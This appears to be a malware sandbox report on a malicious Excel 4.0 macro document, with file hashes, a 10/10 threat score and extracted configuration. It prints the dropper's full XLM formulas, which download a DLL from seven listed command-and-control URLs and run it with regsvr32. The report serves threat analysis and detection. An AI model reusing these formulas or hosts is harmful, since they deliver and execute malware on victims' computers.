General

  • Target

    a8c289f87e46c80550afed8268a936fce63a856fe22e58b940488edf17cc3e29

  • Size

    32KB

  • Sample

    240226-134mpshe97

  • MD5

    fa5e462b0fc8a5cd7e280c6e56468cb4

  • SHA1

    f88c103f2310313078977ad646e6d813008118ae

  • SHA256

    a8c289f87e46c80550afed8268a936fce63a856fe22e58b940488edf17cc3e29

  • SHA512

    0988e956f8a5a92f8283c23aacda71558f50ea113ab0764424e2ded69ac93953da0c675a57033a0ba52fc3bca49d6500e427207315cb7b55b6a6480e34bc4a9a

  • SSDEEP

    384:cjzZPFhNjqEBOA7iEibbwBLg0SCdiVXUKgUrNU/qWhZOdBNPJM+kqr9eCgh0k5lY:cjpFhNNlizXT28dFfPdkqstJmE6/

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://casache.com/web/n3jxwXXwa/

https://www.blessingsource.com/blessingsource.com/rFQ0Ip6lQXXK/

http://ccalaire.com/wp-admin/d1pGRa0X/

http://cdimprintpr.com/brochure2/A9NmYDndZ/

http://careerplan.host20.uk/images/Ls/

http://ausnz.net/2010wc/odSi5tQKkCIXEWl9/

https://azsiacenter.com/js/sOhmiosLJOgwaP6i5nln/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://casache.com/web/n3jxwXXwa/","..\rfs.dll",0,0) =IF('LFEVE'!F11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.blessingsource.com/blessingsource.com/rFQ0Ip6lQXXK/","..\rfs.dll",0,0)) =IF('LFEVE'!F13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://ccalaire.com/wp-admin/d1pGRa0X/","..\rfs.dll",0,0)) =IF('LFEVE'!F15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://cdimprintpr.com/brochure2/A9NmYDndZ/","..\rfs.dll",0,0)) =IF('LFEVE'!F17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://careerplan.host20.uk/images/Ls/","..\rfs.dll",0,0)) =IF('LFEVE'!F19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://ausnz.net/2010wc/odSi5tQKkCIXEWl9/","..\rfs.dll",0,0)) =IF('LFEVE'!F21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://azsiacenter.com/js/sOhmiosLJOgwaP6i5nln/","..\rfs.dll",0,0)) =IF('LFEVE'!F23<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\rfs.dll") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://casache.com/web/n3jxwXXwa/

xlm40.dropper

https://www.blessingsource.com/blessingsource.com/rFQ0Ip6lQXXK/

xlm40.dropper

http://ccalaire.com/wp-admin/d1pGRa0X/

xlm40.dropper

http://cdimprintpr.com/brochure2/A9NmYDndZ/

xlm40.dropper

http://careerplan.host20.uk/images/Ls/

xlm40.dropper

http://ausnz.net/2010wc/odSi5tQKkCIXEWl9/

Targets

    • Target

      a8c289f87e46c80550afed8268a936fce63a856fe22e58b940488edf17cc3e29

    • Size

      32KB

    • MD5

      fa5e462b0fc8a5cd7e280c6e56468cb4

    • SHA1

      f88c103f2310313078977ad646e6d813008118ae

    • SHA256

      a8c289f87e46c80550afed8268a936fce63a856fe22e58b940488edf17cc3e29

    • SHA512

      0988e956f8a5a92f8283c23aacda71558f50ea113ab0764424e2ded69ac93953da0c675a57033a0ba52fc3bca49d6500e427207315cb7b55b6a6480e34bc4a9a

    • SSDEEP

      384:cjzZPFhNjqEBOA7iEibbwBLg0SCdiVXUKgUrNU/qWhZOdBNPJM+kqr9eCgh0k5lY:cjpFhNNlizXT28dFfPdkqstJmE6/

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

MITRE ATT&CK Enterprise v15

Tasks